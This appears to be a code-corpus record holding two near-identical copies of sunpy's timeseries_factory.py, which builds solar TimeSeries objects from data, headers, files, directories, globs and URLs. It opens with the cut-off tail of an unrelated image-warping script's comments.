#returns A, B and C of A1 * x + B1 * y = C1 #Since we only have four lines, we can calculate all possible combination of #intersections. 
If we have parallel lines, there is no intersection #Delete if no intersection #Plot intersection points ####################################################################### ## We finally use the function transform library from skimage ## in order to cut out and warp the image of the plastic part from our ## original (high resoultion) image using the calculated corner points ## ## The skimage.transform.ProjectiveTransform.estimate and the ## skimage.transform.warp functions are very confusing, so I am just glad ## that it works ####################################################################### ###################################################################### ## We finally have our plastic part image in the variable "warped", ## so lets plot it in order to check ###################################################################### # io.imsave(r'C:\Users\tobias.grab\switchdrive\Schule\datax\projekt\test\Testimg1.jpg',warped)
| 2.366281
| 2
|
sunpy/timeseries/timeseries_factory.py
|
ShubhamPandey28/sunpy
| 0
|
6628546
|
<gh_stars>0
"""
This module provies the `~sunpy.timeseries.TimeSeriesFactory` class.
"""
import os
import copy
import glob
import warnings
from collections import OrderedDict
from urllib.request import urlopen
import numpy as np
import pandas as pd
import astropy
import astropy.io.fits
import astropy.units as u
from astropy.table import Table
from astropy.time import Time
import sunpy
from sunpy.io.file_tools import UnrecognizedFileTypeError, read_file
from sunpy.io.fits import HDPair
from sunpy.io.header import FileHeader
from sunpy.timeseries.timeseriesbase import GenericTimeSeries
from sunpy.util import expand_list
from sunpy.util.config import get_and_create_download_dir
from sunpy.util.datatype_factory_base import (BasicRegistrationFactory, MultipleMatchError,
NoMatchError, ValidationFunctionError)
from sunpy.util.metadata import MetaDict
from sunpy.util.net import download_file
__all__ = ['TimeSeries', 'TimeSeriesFactory', 'NoTimeSeriesFound',
'InvalidTimeSeriesInput', 'InvalidTimeSeriesType']
class TimeSeriesFactory(BasicRegistrationFactory):
"""
TimeSeries(*args, **kwargs)
TimeSeries factory class, used to create a variety of `~sunpy.timeseries.TimeSeries` objects.
Valid timeseries types are specified by registering them with the factory.
Parameters
----------
source : `str`, optional
A string to select the observational source of the data, currently
necessary to define how files should be read for all instruments.
concatenate : `bool`, optional
Defaults to `False`.
If set, combine any resulting list of TimeSeries objects into a single
TimeSeries, using successive concatenate methods.
Examples
--------
>>> import sunpy.timeseries
>>> import sunpy.data.sample # doctest: +REMOTE_DATA
>>> my_timeseries = sunpy.timeseries.TimeSeries(sunpy.data.sample.GOES_XRS_TIMESERIES) # doctest: +REMOTE_DATA
The SunPy TimeSeries factory accepts a wide variety of inputs for creating timeseries
* Preloaded tuples of (data, header) pairs or (data, header, units)
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header)) # doctest: +SKIP
Headers and units must be either a `dict`, `~collections.OrderedDict` or `~sunpy.util.metadata.MetaDict`.
* data, header pairs, or data, header units triples, not in tuples
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header) # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header, units) # doctest: +SKIP
* File names for files understood by `sunpy.io` and those not
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits') # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits', source='lyra') # doctest: +SKIP
* Multiple files can be combined into one TimeSeries, as long as they are the same source
>>> my_timeseries = sunpy.timeseries.TimeSeries(['goesfile1.fits', 'goesfile2.fits'],
... concatenate=True) # doctest: +SKIP
* All fits files in a directory by giving a directory
>>> my_timeseries = sunpy.timeseries.TimeSeries('local_dir/sub_dir') # doctest: +SKIP
* Some regex globs
>>> my_timeseries = sunpy.timeseries.TimeSeries('eit_*.fits') # doctest: +SKIP
* URLs
>>> my_timeseries = sunpy.timeseries.TimeSeries(url) # doctest: +SKIP
* Lists of any of the above
>>> my_timeseries = sunpy.timeseries.TimeSeries(['file1.fits', 'file2.fits',
... 'file3.fits', 'directory1/']) # doctest: +SKIP
* Any mixture of the above not in a list
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header), data2, header2,
... 'file1.fits', url, 'eit_*.fits') # doctest: +SKIP
"""
@staticmethod
def _read_file(fname, **kwargs):
"""
Reading a file with `sunpy.io` for automatic source detection.
Parameters
----------
fname : `str`
The file path to parse.
Returns
-------
parsed : `bool`
`True` if file has been read.
pairs : `list` or `str`
List of ``(data, header)`` pairs if ``parsed`` is `True`, ``fname`` if ``parsed`` is `False`.
`False` if the file is not supported or incorrect.
"""
if 'source' not in kwargs.keys() or not kwargs['source']:
try:
pairs = read_file(fname, **kwargs)
new_pairs = []
for pair in pairs:
filedata, filemeta = pair
if isinstance(filemeta, FileHeader):
data = filedata
meta = MetaDict(filemeta)
new_pairs.append(HDPair(data, meta))
return True, new_pairs
except UnrecognizedFileTypeError:
return False, fname
else:
return False, fname
@staticmethod
def _validate_meta(meta):
"""
Validate a meta argument for use as metadata.
Currently only validates by class.
"""
if isinstance(meta, astropy.io.fits.header.Header):
return True
elif isinstance(meta, sunpy.io.header.FileHeader):
return True
elif isinstance(meta, dict):
return True
else:
return False
@staticmethod
def _validate_units(units):
"""
Validates the astropy unit-information associated with a
`~sunpy.timeseries.TimeSeries`.
Should be a dictionary of some form (but not
`sunpy.util.metadict.MetaDict`) with only `astropy.units` for
values.
"""
warnings.simplefilter('always', Warning)
result = True
# It must be a dictionary
if not isinstance(units, dict) or isinstance(units, MetaDict):
return False
for key in units:
if not isinstance(units[key], u.UnitBase):
# If this is not a unit then this can't be a valid units dict.
return False
# Passed all the tests
return result
@staticmethod
def _from_table(t):
"""
Extract the data, metadata and units from an astropy table for use in
constructing a `~sunpy.timeseries.TimeSeries`.
Parameters
----------
t: `~astropy.table.Table`
The input table. The datetime column must be the first column or the (single) primary key index.
"""
table = copy.deepcopy(t)
# Default the time index to the first column
index_name = table.colnames[0]
# Check if another column is defined as the index/primary_key
if table.primary_key:
# Check there is only one primary_key/index column
if len(table.primary_key) == 1:
table.primary_key[0]
else:
raise ValueError("Invalid input Table, TimeSeries doesn't support conversion"
" of tables with more then one index column.")
# Extract, convert and remove the index column from the input table
index = table[index_name]
# Convert if the index is given as an astropy Time object
if isinstance(index, Time):
index = index.datetime
index = pd.to_datetime(index)
table.remove_column(index_name)
# Extract the column values from the table
data = {}
units = {}
for colname in table.colnames:
data[colname] = table[colname]
units[colname] = table[colname].unit
# Create a dataframe with this and return
df = pd.DataFrame(data=data, index=index)
return df, MetaDict(table.meta), units
    def _parse_args(self, *args, **kwargs):
        """
        Parses an `args` list for data-header pairs. `args` can contain any mixture of the following
        entries:

        * tuples of (data, header, unit) (1)
        * data, header not in a tuple (1)
        * filename, which will be read
        * directory, from which all files will be read
        * glob, from which all files will be read
        * url, which will be downloaded and read
        * lists containing any of the above.

        (1) header/unit are optional and in either order, but data should be the first entry in each group.

        Returns
        -------
        tuple
            ``(data_header_unit_tuples, data_header_pairs, already_timeseries, filepaths)``
            — respectively: in-memory (data, meta, units) triples, HDU pair
            lists read by `sunpy.io`, TimeSeries passed through unchanged, and
            paths of files that need a source-specific reader.

        Examples
        --------
        self._parse_args(data, header,
                         (data, header),
                         ['file1', 'file2', 'file3'],
                         'file4',
                         'directory1',
                         '*.fits')
        """
        data_header_unit_tuples = list()
        data_header_pairs = list()
        already_timeseries = list()
        filepaths = list()
        # Account for nested lists of items. Simply outputs a single list of
        # items, nested lists are expanded to element level.
        args = expand_list(args)
        # For each of the arguments, handle each of the cases.
        # A while loop (rather than a for loop) is used because a data
        # argument may consume the following one or two args (meta/units),
        # advancing `i` by more than one per iteration.
        i = 0
        while i < len(args):
            arg = args[i]
            # Data-header pair in a tuple
            if (isinstance(arg, (np.ndarray, Table, pd.DataFrame))):
                # and self._validate_meta(args[i+1])):
                # Assume a Pandas Dataframe is given
                data = arg
                units = OrderedDict()
                meta = MetaDict()
                # Convert the data argument into a Pandas DataFrame if needed.
                if isinstance(data, Table):
                    # We have an Astropy Table:
                    data, meta, units = self._from_table(data)
                elif isinstance(data, np.ndarray):
                    # We have a numpy ndarray. We assume the first column is a dt index
                    data = pd.DataFrame(data=data[:, 1:], index=Time(data[:, 0]))
                # If there are 1 or 2 more arguments: they may be a units dict
                # and/or a metadata object, in either order.
                for _ in range(2):
                    if (len(args) > i+1):
                        # If that next argument isn't data but is metadata or units:
                        if not isinstance(args[i+1], (np.ndarray, Table, pd.DataFrame)):
                            if self._validate_units(args[i+1]):
                                units.update(args[i+1])
                                i += 1  # an extra increment to account for the units
                            elif self._validate_meta(args[i+1]):
                                # if we have an astropy.io FITS header then convert
                                # to preserve multi-line comments
                                if isinstance(args[i+1], astropy.io.fits.header.Header):
                                    args[i+1] = MetaDict(sunpy.io.header.FileHeader(args[i+1]))
                                meta.update(args[i+1])
                                i += 1  # an extra increment to account for the meta
                # Add a 3-tuple for this TimeSeries.
                data_header_unit_tuples.append((data, meta, units))
            # Filepath
            elif (isinstance(arg, str) and
                  os.path.isfile(os.path.expanduser(arg))):
                path = os.path.expanduser(arg)
                result = self._read_file(path, **kwargs)
                # _apply_result is a module-level helper: routes the result to
                # data_header_pairs (read OK) or filepaths (needs a source).
                data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
            # Directory
            elif (isinstance(arg, str) and
                  os.path.isdir(os.path.expanduser(arg))):
                path = os.path.expanduser(arg)
                files = [os.path.join(path, elem) for elem in os.listdir(path)]
                for afile in files:
                    # returns a boolean telling us if it were read and either a
                    # tuple or the original filepath for reading by a source
                    result = self._read_file(afile, **kwargs)
                    data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
                                                                 result)
            # Glob
            elif isinstance(arg, str) and '*' in arg:
                files = glob.glob(os.path.expanduser(arg))
                for afile in files:
                    # returns a boolean telling us if it were read and either a
                    # tuple or the original filepath for reading by a source
                    result = self._read_file(afile, **kwargs)
                    data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
                                                                 result)
            # Already a TimeSeries
            elif isinstance(arg, GenericTimeSeries):
                already_timeseries.append(arg)
            # A URL
            elif (isinstance(arg, str) and
                  _is_url(arg)):
                url = arg
                path = download_file(url, get_and_create_download_dir())
                result = self._read_file(path, **kwargs)
                data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
            else:
                raise NoMatchError("File not found or invalid input")
            i += 1
        # TODO:
        # In the end, if there are already TimeSeries it should be put in the
        # same order as the input, currently they are not.
        return data_header_unit_tuples, data_header_pairs, already_timeseries, filepaths
def __call__(self, *args, silence_errors=False, **kwargs):
"""
Method for running the factory. Takes arbitrary arguments and keyword
arguments and passes them to a sequence of pre-registered types to
determine which is the correct `~sunpy.timeseries.TimeSeries` source
type to build.
Arguments args and kwargs are passed through to the validation function and to the constructor for the final type.
For `~sunpy.timeseries.TimeSeries` types, validation function must take a data-header pair as an argument.
Parameters
----------
silence_errors : `bool`, optional
If set, ignore data-header pairs which cause an exception.
Defaults to `False`.
Notes
-----
Extra keyword arguments are passed through to `sunpy.io.read_file` such as `memmap` for FITS files.
"""
(data_header_unit_tuples, data_header_pairs,
already_timeseries, filepaths) = self._parse_args(*args, **kwargs)
new_timeseries = list()
# The filepaths for unreadable files
for filepath in filepaths:
try:
new_ts = self._check_registered_widgets(filepath=filepath, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
# data_header_pairs is a list of HDUs as read by sunpy.io
# For each set of HDus find the matching class and read the
# data_header_unit_tuples by calling the _parse_hdus method
# of the class.
for pairs in data_header_pairs:
# Pairs may be x long where x is the number of HDUs in the file.
headers = [pair.header for pair in pairs]
types = []
for header in headers:
try:
match = self._get_matching_widget(meta=header, **kwargs)
if not match == GenericTimeSeries:
types.append(match)
except (MultipleMatchError, NoMatchError):
continue
if not types:
# If no specific classes have been found we can read the data
# if we only have one data header pair:
if len(pairs) == 1:
already_timeseries.append(GenericTimeSeries(pairs[0].data,
pairs[0].header))
else:
raise NoMatchError("Input read by sunpy.io can not find a "
"matching class for reading multiple HDUs")
if len(set(types)) > 1:
raise MultipleMatchError("Multiple HDUs return multiple matching classes.")
cls = types[0]
data_header_unit_tuples.append(cls._parse_hdus(pairs))
# Loop over each registered type and check to see if WidgetType
# matches the arguments. If it does, use that type
for triple in data_header_unit_tuples:
data, header, units = triple
# Make a MetaDict from various input types
meta = header
if isinstance(meta, astropy.io.fits.header.Header):
meta = sunpy.io.header.FileHeader(meta)
meta = MetaDict(meta)
try:
new_ts = self._check_registered_widgets(data=data, meta=meta,
units=units, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
new_timeseries += already_timeseries
# Concatenate the timeseries into one if specified.
concatenate = kwargs.get('concatenate', False)
if concatenate:
# Merge all these timeseries into one.
full_timeseries = new_timeseries.pop(0)
for timeseries in new_timeseries:
full_timeseries = full_timeseries.concatenate(timeseries)
new_timeseries = [full_timeseries]
# Sanitize any units OrderedDict details
for timeseries in new_timeseries:
timeseries._sanitize_units()
# Only return single time series, not in a list if we only have one.
if len(new_timeseries) == 1:
return new_timeseries[0]
return new_timeseries
def _get_matching_widget(self, **kwargs):
candidate_widget_types = list()
for key in self.registry:
# Call the registered validation function for each registered class
if self.registry[key](**kwargs):
candidate_widget_types.append(key)
n_matches = len(candidate_widget_types)
if n_matches == 0:
if self.default_widget_type is None:
raise NoMatchError("No types match specified arguments and no default is set.")
else:
candidate_widget_types = [self.default_widget_type]
elif n_matches > 1:
raise MultipleMatchError("Too many candidate types identified ({0})."
"Specify enough keywords to guarantee unique type "
"identification.".format(n_matches))
# Only one suitable source class is found
return candidate_widget_types[0]
def _check_registered_widgets(self, **kwargs):
"""
Checks the (instrument) source(s) that are compatible with this given
file/data.
Only if exactly one source is compatible will a
`~sunpy.timeseries.TimeSeries` be returned.
"""
WidgetType = self._get_matching_widget(**kwargs)
# Dealing with the fact that timeseries filetypes are less consistent
# (then maps), we use a _parse_file() method embedded into each
# instrument subclass.
filepath = kwargs.pop('filepath', None)
data = kwargs.pop('data', None)
meta = kwargs.pop('meta', None)
units = kwargs.pop('units', None)
if filepath:
data, meta, units = WidgetType._parse_file(filepath)
# Now return a TimeSeries from the given file.
return WidgetType(data, meta, units, **kwargs)
def _apply_result(data_header_pairs, filepaths, result):
read, result = result
if read:
data_header_pairs.append(result)
else:
filepaths.append(result)
return data_header_pairs, filepaths
def _is_url(arg):
try:
urlopen(arg)
except Exception:
return False
return True
class InvalidTimeSeriesInput(ValueError):
    """
    Raised when an input variable is not a `~sunpy.timeseries.TimeSeries`
    instance and does not point to a valid TimeSeries input file.
    """
class InvalidTimeSeriesType(ValueError):
    """
    Raised when an invalid type of timeseries is requested with
    `~sunpy.timeseries.TimeSeries`.
    """
class NoTimeSeriesFound(ValueError):
    """
    Raised when the input does not point to any valid
    `~sunpy.timeseries.TimeSeries` or files.
    """
# Module-level factory instance: this is the callable users invoke as
# ``sunpy.timeseries.TimeSeries(...)``. It dispatches to whichever source
# class in ``GenericTimeSeries._registry`` claims the input via its
# ``is_datasource_for`` validation function, falling back to
# ``GenericTimeSeries`` when nothing more specific matches.
TimeSeries = TimeSeriesFactory(registry=GenericTimeSeries._registry,
                               default_widget_type=GenericTimeSeries,
                               additional_validation_functions=['is_datasource_for'])
|
"""
This module provides the `~sunpy.timeseries.TimeSeriesFactory` class.
"""
import os
import copy
import glob
import warnings
from collections import OrderedDict
from urllib.request import urlopen
import numpy as np
import pandas as pd
import astropy
import astropy.io.fits
import astropy.units as u
from astropy.table import Table
from astropy.time import Time
import sunpy
from sunpy.io.file_tools import UnrecognizedFileTypeError, read_file
from sunpy.io.fits import HDPair
from sunpy.io.header import FileHeader
from sunpy.timeseries.timeseriesbase import GenericTimeSeries
from sunpy.util import expand_list
from sunpy.util.config import get_and_create_download_dir
from sunpy.util.datatype_factory_base import (BasicRegistrationFactory, MultipleMatchError,
NoMatchError, ValidationFunctionError)
from sunpy.util.metadata import MetaDict
from sunpy.util.net import download_file
__all__ = ['TimeSeries', 'TimeSeriesFactory', 'NoTimeSeriesFound',
'InvalidTimeSeriesInput', 'InvalidTimeSeriesType']
class TimeSeriesFactory(BasicRegistrationFactory):
"""
TimeSeries(*args, **kwargs)
TimeSeries factory class, used to create a variety of `~sunpy.timeseries.TimeSeries` objects.
Valid timeseries types are specified by registering them with the factory.
Parameters
----------
source : `str`, optional
A string to select the observational source of the data, currently
necessary to define how files should be read for all instruments.
concatenate : `bool`, optional
Defaults to `False`.
If set, combine any resulting list of TimeSeries objects into a single
TimeSeries, using successive concatenate methods.
Examples
--------
>>> import sunpy.timeseries
>>> import sunpy.data.sample # doctest: +REMOTE_DATA
>>> my_timeseries = sunpy.timeseries.TimeSeries(sunpy.data.sample.GOES_XRS_TIMESERIES) # doctest: +REMOTE_DATA
The SunPy TimeSeries factory accepts a wide variety of inputs for creating timeseries
* Preloaded tuples of (data, header) pairs or (data, header, units)
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header)) # doctest: +SKIP
Headers and units must be either a `dict`, `~collections.OrderedDict` or `~sunpy.util.metadata.MetaDict`.
* data, header pairs, or data, header units triples, not in tuples
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header) # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries(data, header, units) # doctest: +SKIP
* File names for files understood by `sunpy.io` and those not
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits') # doctest: +SKIP
>>> my_timeseries = sunpy.timeseries.TimeSeries('filename.fits', source='lyra') # doctest: +SKIP
* Multiple files can be combined into one TimeSeries, as long as they are the same source
>>> my_timeseries = sunpy.timeseries.TimeSeries(['goesfile1.fits', 'goesfile2.fits'],
... concatenate=True) # doctest: +SKIP
* All fits files in a directory by giving a directory
>>> my_timeseries = sunpy.timeseries.TimeSeries('local_dir/sub_dir') # doctest: +SKIP
* Some regex globs
>>> my_timeseries = sunpy.timeseries.TimeSeries('eit_*.fits') # doctest: +SKIP
* URLs
>>> my_timeseries = sunpy.timeseries.TimeSeries(url) # doctest: +SKIP
* Lists of any of the above
>>> my_timeseries = sunpy.timeseries.TimeSeries(['file1.fits', 'file2.fits',
... 'file3.fits', 'directory1/']) # doctest: +SKIP
* Any mixture of the above not in a list
>>> my_timeseries = sunpy.timeseries.TimeSeries((data, header), data2, header2,
... 'file1.fits', url, 'eit_*.fits') # doctest: +SKIP
"""
@staticmethod
def _read_file(fname, **kwargs):
"""
Reading a file with `sunpy.io` for automatic source detection.
Parameters
----------
fname : `str`
The file path to parse.
Returns
-------
parsed : `bool`
`True` if file has been read.
pairs : `list` or `str`
List of ``(data, header)`` pairs if ``parsed`` is `True`, ``fname`` if ``parsed`` is `False`.
`False` if the file is not supported or incorrect.
"""
if 'source' not in kwargs.keys() or not kwargs['source']:
try:
pairs = read_file(fname, **kwargs)
new_pairs = []
for pair in pairs:
filedata, filemeta = pair
if isinstance(filemeta, FileHeader):
data = filedata
meta = MetaDict(filemeta)
new_pairs.append(HDPair(data, meta))
return True, new_pairs
except UnrecognizedFileTypeError:
return False, fname
else:
return False, fname
@staticmethod
def _validate_meta(meta):
"""
Validate a meta argument for use as metadata.
Currently only validates by class.
"""
if isinstance(meta, astropy.io.fits.header.Header):
return True
elif isinstance(meta, sunpy.io.header.FileHeader):
return True
elif isinstance(meta, dict):
return True
else:
return False
@staticmethod
def _validate_units(units):
"""
Validates the astropy unit-information associated with a
`~sunpy.timeseries.TimeSeries`.
Should be a dictionary of some form (but not
`sunpy.util.metadict.MetaDict`) with only `astropy.units` for
values.
"""
warnings.simplefilter('always', Warning)
result = True
# It must be a dictionary
if not isinstance(units, dict) or isinstance(units, MetaDict):
return False
for key in units:
if not isinstance(units[key], u.UnitBase):
# If this is not a unit then this can't be a valid units dict.
return False
# Passed all the tests
return result
@staticmethod
def _from_table(t):
"""
Extract the data, metadata and units from an astropy table for use in
constructing a `~sunpy.timeseries.TimeSeries`.
Parameters
----------
t: `~astropy.table.Table`
The input table. The datetime column must be the first column or the (single) primary key index.
"""
table = copy.deepcopy(t)
# Default the time index to the first column
index_name = table.colnames[0]
# Check if another column is defined as the index/primary_key
if table.primary_key:
# Check there is only one primary_key/index column
if len(table.primary_key) == 1:
table.primary_key[0]
else:
raise ValueError("Invalid input Table, TimeSeries doesn't support conversion"
" of tables with more then one index column.")
# Extract, convert and remove the index column from the input table
index = table[index_name]
# Convert if the index is given as an astropy Time object
if isinstance(index, Time):
index = index.datetime
index = pd.to_datetime(index)
table.remove_column(index_name)
# Extract the column values from the table
data = {}
units = {}
for colname in table.colnames:
data[colname] = table[colname]
units[colname] = table[colname].unit
# Create a dataframe with this and return
df = pd.DataFrame(data=data, index=index)
return df, MetaDict(table.meta), units
    def _parse_args(self, *args, **kwargs):
        """
        Parses an `args` list for data-header pairs. `args` can contain any
        mixture of the following entries:

        * tuples of (data, header, unit) (1)
        * data, header not in a tuple (1)
        * filename, which will be read
        * directory, from which all files will be read
        * glob, from which all files will be read
        * url, which will be downloaded and read
        * lists containing any of the above.

        (1) header/unit are optional and in either order, but data should be
        the first entry in each group.

        Returns
        -------
        `tuple`
            ``(data_header_unit_tuples, data_header_pairs,
            already_timeseries, filepaths)`` — pre-parsed triples, HDU pairs
            read by sunpy.io, TimeSeries passed straight through, and file
            paths sunpy.io could not read.

        Examples
        --------
        self._parse_args(data, header,
                         (data, header),
                         ['file1', 'file2', 'file3'],
                         'file4',
                         'directory1',
                         '*.fits')
        """
        data_header_unit_tuples = list()
        data_header_pairs = list()
        already_timeseries = list()
        filepaths = list()
        # Account for nested lists of items. Simply outputs a single list of
        # items, nested lists are expanded to element level.
        args = expand_list(args)
        # A while loop (not a for) because consuming a trailing header/units
        # argument advances ``i`` by an extra step.
        i = 0
        while i < len(args):
            arg = args[i]
            # Data (array/table/dataframe), optionally followed by header
            # and/or units arguments.
            if (isinstance(arg, (np.ndarray, Table, pd.DataFrame))):
                # and self._validate_meta(args[i+1])):
                # Assume a Pandas Dataframe is given
                data = arg
                units = OrderedDict()
                meta = MetaDict()
                # Convert the data argument into a Pandas DataFrame if needed.
                if isinstance(data, Table):
                    # We have an Astropy Table:
                    data, meta, units = self._from_table(data)
                elif isinstance(data, np.ndarray):
                    # We have a numpy ndarray. We assume the first column is a dt index
                    data = pd.DataFrame(data=data[:, 1:], index=Time(data[:, 0]))
                # If there are 1 or 2 more arguments:
                for _ in range(2):
                    if (len(args) > i+1):
                        # If that next argument isn't data but is metadata or units:
                        if not isinstance(args[i+1], (np.ndarray, Table, pd.DataFrame)):
                            if self._validate_units(args[i+1]):
                                units.update(args[i+1])
                                i += 1  # an extra increment to account for the units
                            elif self._validate_meta(args[i+1]):
                                # if we have an astropy.io FITS header then convert
                                # to preserve multi-line comments
                                if isinstance(args[i+1], astropy.io.fits.header.Header):
                                    args[i+1] = MetaDict(sunpy.io.header.FileHeader(args[i+1]))
                                meta.update(args[i+1])
                                i += 1  # an extra increment to account for the meta
                # Add a 3-tuple for this TimeSeries.
                data_header_unit_tuples.append((data, meta, units))
            # Filepath
            elif (isinstance(arg, str) and
                  os.path.isfile(os.path.expanduser(arg))):
                path = os.path.expanduser(arg)
                result = self._read_file(path, **kwargs)
                data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
            # Directory
            elif (isinstance(arg, str) and
                  os.path.isdir(os.path.expanduser(arg))):
                path = os.path.expanduser(arg)
                files = [os.path.join(path, elem) for elem in os.listdir(path)]
                for afile in files:
                    # returns a boolean telling us if it were read and either a
                    # tuple or the original filepath for reading by a source
                    result = self._read_file(afile, **kwargs)
                    data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
                                                                 result)
            # Glob
            elif isinstance(arg, str) and '*' in arg:
                files = glob.glob(os.path.expanduser(arg))
                for afile in files:
                    # returns a boolean telling us if it were read and either a
                    # tuple or the original filepath for reading by a source
                    result = self._read_file(afile, **kwargs)
                    data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths,
                                                                 result)
            # Already a TimeSeries
            elif isinstance(arg, GenericTimeSeries):
                already_timeseries.append(arg)
            # A URL: download it, then read the local copy.
            elif (isinstance(arg, str) and
                  _is_url(arg)):
                url = arg
                path = download_file(url, get_and_create_download_dir())
                result = self._read_file(path, **kwargs)
                data_header_pairs, filepaths = _apply_result(data_header_pairs, filepaths, result)
            else:
                raise NoMatchError("File not found or invalid input")
            i += 1
        # TODO:
        # In the end, if there are already TimeSeries it should be put in the
        # same order as the input, currently they are not.
        return data_header_unit_tuples, data_header_pairs, already_timeseries, filepaths
def __call__(self, *args, silence_errors=False, **kwargs):
"""
Method for running the factory. Takes arbitrary arguments and keyword
arguments and passes them to a sequence of pre-registered types to
determine which is the correct `~sunpy.timeseries.TimeSeries` source
type to build.
Arguments args and kwargs are passed through to the validation function and to the constructor for the final type.
For `~sunpy.timeseries.TimeSeries` types, validation function must take a data-header pair as an argument.
Parameters
----------
silence_errors : `bool`, optional
If set, ignore data-header pairs which cause an exception.
Defaults to `False`.
Notes
-----
Extra keyword arguments are passed through to `sunpy.io.read_file` such as `memmap` for FITS files.
"""
(data_header_unit_tuples, data_header_pairs,
already_timeseries, filepaths) = self._parse_args(*args, **kwargs)
new_timeseries = list()
# The filepaths for unreadable files
for filepath in filepaths:
try:
new_ts = self._check_registered_widgets(filepath=filepath, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
# data_header_pairs is a list of HDUs as read by sunpy.io
# For each set of HDus find the matching class and read the
# data_header_unit_tuples by calling the _parse_hdus method
# of the class.
for pairs in data_header_pairs:
# Pairs may be x long where x is the number of HDUs in the file.
headers = [pair.header for pair in pairs]
types = []
for header in headers:
try:
match = self._get_matching_widget(meta=header, **kwargs)
if not match == GenericTimeSeries:
types.append(match)
except (MultipleMatchError, NoMatchError):
continue
if not types:
# If no specific classes have been found we can read the data
# if we only have one data header pair:
if len(pairs) == 1:
already_timeseries.append(GenericTimeSeries(pairs[0].data,
pairs[0].header))
else:
raise NoMatchError("Input read by sunpy.io can not find a "
"matching class for reading multiple HDUs")
if len(set(types)) > 1:
raise MultipleMatchError("Multiple HDUs return multiple matching classes.")
cls = types[0]
data_header_unit_tuples.append(cls._parse_hdus(pairs))
# Loop over each registered type and check to see if WidgetType
# matches the arguments. If it does, use that type
for triple in data_header_unit_tuples:
data, header, units = triple
# Make a MetaDict from various input types
meta = header
if isinstance(meta, astropy.io.fits.header.Header):
meta = sunpy.io.header.FileHeader(meta)
meta = MetaDict(meta)
try:
new_ts = self._check_registered_widgets(data=data, meta=meta,
units=units, **kwargs)
new_timeseries.append(new_ts)
except (NoMatchError, MultipleMatchError, ValidationFunctionError):
if not silence_errors:
raise
except Exception:
raise
new_timeseries += already_timeseries
# Concatenate the timeseries into one if specified.
concatenate = kwargs.get('concatenate', False)
if concatenate:
# Merge all these timeseries into one.
full_timeseries = new_timeseries.pop(0)
for timeseries in new_timeseries:
full_timeseries = full_timeseries.concatenate(timeseries)
new_timeseries = [full_timeseries]
# Sanitize any units OrderedDict details
for timeseries in new_timeseries:
timeseries._sanitize_units()
# Only return single time series, not in a list if we only have one.
if len(new_timeseries) == 1:
return new_timeseries[0]
return new_timeseries
def _get_matching_widget(self, **kwargs):
candidate_widget_types = list()
for key in self.registry:
# Call the registered validation function for each registered class
if self.registry[key](**kwargs):
candidate_widget_types.append(key)
n_matches = len(candidate_widget_types)
if n_matches == 0:
if self.default_widget_type is None:
raise NoMatchError("No types match specified arguments and no default is set.")
else:
candidate_widget_types = [self.default_widget_type]
elif n_matches > 1:
raise MultipleMatchError("Too many candidate types identified ({0})."
"Specify enough keywords to guarantee unique type "
"identification.".format(n_matches))
# Only one suitable source class is found
return candidate_widget_types[0]
def _check_registered_widgets(self, **kwargs):
"""
Checks the (instrument) source(s) that are compatible with this given
file/data.
Only if exactly one source is compatible will a
`~sunpy.timeseries.TimeSeries` be returned.
"""
WidgetType = self._get_matching_widget(**kwargs)
# Dealing with the fact that timeseries filetypes are less consistent
# (then maps), we use a _parse_file() method embedded into each
# instrument subclass.
filepath = kwargs.pop('filepath', None)
data = kwargs.pop('data', None)
meta = kwargs.pop('meta', None)
units = kwargs.pop('units', None)
if filepath:
data, meta, units = WidgetType._parse_file(filepath)
# Now return a TimeSeries from the given file.
return WidgetType(data, meta, units, **kwargs)
def _apply_result(data_header_pairs, filepaths, result):
read, result = result
if read:
data_header_pairs.append(result)
else:
filepaths.append(result)
return data_header_pairs, filepaths
def _is_url(arg):
try:
urlopen(arg)
except Exception:
return False
return True
class InvalidTimeSeriesInput(ValueError):
    """
    Raised when an input variable is not a `~sunpy.timeseries.TimeSeries`
    instance and does not point to a valid TimeSeries input file.
    """
class InvalidTimeSeriesType(ValueError):
    """
    Raised when an invalid type of timeseries is requested with
    `~sunpy.timeseries.TimeSeries`.
    """
class NoTimeSeriesFound(ValueError):
    """
    Raised when the input does not point to any valid
    `~sunpy.timeseries.TimeSeries` or files.
    """
# Module-level factory instance: this is the callable users invoke as
# ``sunpy.timeseries.TimeSeries(...)``. It dispatches to whichever source
# class in ``GenericTimeSeries._registry`` claims the input via its
# ``is_datasource_for`` validation function, falling back to
# ``GenericTimeSeries`` when nothing more specific matches.
TimeSeries = TimeSeriesFactory(registry=GenericTimeSeries._registry,
                               default_widget_type=GenericTimeSeries,
                               additional_validation_functions=['is_datasource_for'])
|
en
| 0.712033
|
